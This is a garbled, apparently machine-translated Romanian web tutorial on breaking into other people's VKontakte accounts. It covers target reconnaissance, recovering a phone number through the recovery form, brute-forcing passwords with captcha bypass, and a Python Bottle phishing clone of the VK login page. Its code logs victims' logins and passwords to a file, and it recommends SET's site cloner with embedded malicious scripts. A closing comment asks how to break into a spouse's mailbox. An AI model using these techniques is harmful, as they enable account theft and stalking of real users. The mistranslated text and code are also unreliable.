Cum de a hack un VKontakte?
Un răspuns simplu - nici un fel! Mai completă - dacă considerați că majoritatea utilizatorilor fac greșeli, atunci hacking-ul este posibil, dar nu confundați conceptul.
Vulnerabilitatea care vă permite să hack absolut orice utilizator în cinci secunde nu este și nu va fi. Și dacă este așa, nimeni nu o va oferi. Prin urmare, acele metode care sunt prezentate mai jos, într-un fel sau altul, au ca scop cheatingul utilizatorului și utilizarea absenței creierului său.
Împărțim întregul proces în mai multe etape. Inițial, vom avea nevoie de un obiectiv, de timp liber, de acces sigur la VC.
Colectarea de informații
În acest stadiu, avem o pagină de utilizator, pe care ar fi de dorit să o hackem și trebuie să colectăm cât mai multe informații utile posibil, ceea ce ar ajuta ulterior la succesul hacking-ului.
Ce este pe pagină?
Am selectat-o și îi obligăm pe utilizator să conecteze telefonul mobil la serviciu. Acum nu aveți doar două cifre de corespondență. Pentru a le cunoaște, trebuie doar să sortați formularul de recuperare care utilizează deja numărul. Doar 99 de ori. De asemenea, puteți automatiza. Iar când solicită numele paginii, cum să adăugăm protecție, pur și simplu o introducem. La urma urmei, știm pagina țintă.
De asemenea, în unele cazuri, oamenii preferă să-și publice numărul pe pagină, ci să închidă o parte din număr cu asteriscuri, liniuțe etc. Dacă aveți noroc, atunci cifrele care nu vă sunt disponibile sub forma restaurării VK vor fi închise.
1) Protecția socială. O dată îți spun că această metodă este potrivită fie pentru absolvenții școlilor, fie, dimpotrivă, pentru bătrânii care știu puțin despre Internet, dar au decis să aibă motive să-l facă în соц.сеети. Dacă doriți doar să practici, atunci începătorii pot fi găsiți
aici.
Practic, un mecanism simplu este folosit aici. O persoană care nu înțelege ceva, are încredere în subconștient utilizatorilor / administratorilor / asistenței tehnice mai experimentați și le acceptă cuvintele.
În această metodă, totul depinde de dvs., astfel încât să vă puteți pompa abilitățile pe tot felul de nou-veniți la VC și apoi să treceți la utilizatori mai mult sau mai puțin obișnuiți.
Pentru el, avem nevoie, onorat numai în dicționarul nostru de utilizare. Acest lucru nu poate fi dus nicăieri, așa că reușim noi înșine. Ce avem? Exemplu (personajul este fictiv).
Există, de asemenea, o pagină a VK. pe care este scris ce parole ar trebui indicate, ce simboluri sunt posibile și cele mai frecvente parole.
A apărut o foaie de 14 linii. Dar din ea este încă necesară crearea de combinații de parole, care ar putea fi create de utilizatorul îngust.
Mai jos este un mic script Python care face acest lucru.
Din 14, s-au obținut 1272 de versiuni.
Dar ce să facem? Nu stați și parcurgeți manual fiecare parolă.
Desigur, este necesar să automatizezi totul mai mult sau mai puțin.
În acest scop, există un script care bruteste prin versiunea mobilă a lui Vk.
Este pentru o singură țintă, fără proxy și multithreading. Dar el poate intra el însuși figurile dispărute în apărare de la apelul din altă țară. De asemenea, cu ajutorul unui anti-gay intră ușor în captcha, care apar după o încercare de intrare 5-6 de la un ip.
3) Falsul nostru este totul. Această metodă este concepută pentru persoane inategente. În cea mai mare parte, ele sunt fie atrase de un freebie, fie atenție redirecționată cu ajutorul mai multor litere. Mai jos este o modalitate de a crea un fals simplu pe baza unui site wk comun (pagina de conectare). Puteți lua atât versiunea mobilă, cât și versiunea de bază, în funcție de dispozitivul pe care utilizatorul se va conecta. În ceea ce privește înregistrarea pentru găzduirea și achiziționarea unui domeniu similar, nu voi scrie nimic, pentru că este pur și simplu banal.
În primul rând, descărcați pagina de conectare prin browserul dvs. Apoi modificați codificarea fișierului html la utf-8.
Mai întâi definim codificarea
file -mime-encoding file.html
Apoi, trecem de la original la cel nou
iconv -f iso-8859-1 -t utf-8 file.html> vk2.html
Apoi, trebuie să creați o gestionare a paginii în limba serverului. În acest scop, puteți utiliza Python. Puteți folosi cel mai simplu cadru numit sticla. Este un plus, prin faptul că nu are nevoie de dependențe. Doar descărcați fișierul script de pe site și asta-i tot.
@route ('/')
index def ():
șablonul de returnare ("vk2.html")
@route ('/ Bine ați venit! | VK_files /')
def server_static (filepath):
retur static_file (filepath, root = '. / Bine ati venit! | VK_files /')
După rularea testului, eroarea 404 a fost găsită pe unele fișiere.
Din păcate, nu avem imaginile potrivite de pe site. Să le punem într-un dosar cu imagini separate.
Să scriem o nouă rutare în scenariu.
@route ('/ images /
def server_static (filepath):
retur static_file (filepath, root = '. / images /')
Acum totul a devenit un ordin de mărime mai frumos. Desigur, puteți descărca și paginile principale, pe care le puteți accesa fără a vă conecta, pentru ao face mai credibilă (și apoi pentru a schimba linkurile către principalele), dar unul va fi suficient.
Ce lipsește? Da, bineînțeles. După conectare, nu se întâmplă nimic. Să schimbăm asta.
Adăugați rutarea pentru solicitarea postării. Găsiți formularul de autentificare pe pagină. Schimbați codul de acțiune pentru a fi golit și eliminați verificarea la submisiune. Și adăugați prelucrarea post-cerere.
@post ('/')
index def ():
login = request.forms.get ('email')
password = request.forms.get ('pass')
print "| Catch | --------------" + login + ':' + parola
cu deschis ("log.txt", "a") ca fișier myfile:
myfile.write (login + ':' + parola + "\ n")
Așa funcționează. Adevărul este numai după apăsarea butonului Enter, dar nu la apăsarea unui buton.
Transferăm eticheta de buton care se găsește sub formular în cod la limitele formularului și adăugăm tipul de proprietate = "trimite".
După aceea, butonul funcționează așa cum ar trebui. Arhiva cu decizia gata.
Dacă doriți să utilizați o soluție gata, puteți folosi butonul SET. Instrumentul pentru ingineri sociali. Este inclusă în distribuția de potasiu. Puteți instala pe un debian normal pe server folosind replici kali sau prin setarea separată a tuturor dependențelor.
Utilizați funcția de clonare a site-ului în set. Are caracteristici suplimentare, cum ar fi încorporarea de script-uri malware direct în pagină sau adăugarea unui blitz periculos.
altfel am început să cred că:
1. cântecul tău este cântat
Soția schimbă campania, a creat o casetă stângă (********* @ bk.ru). Cum să-l arzi?
Trimiteți-le prietenilor: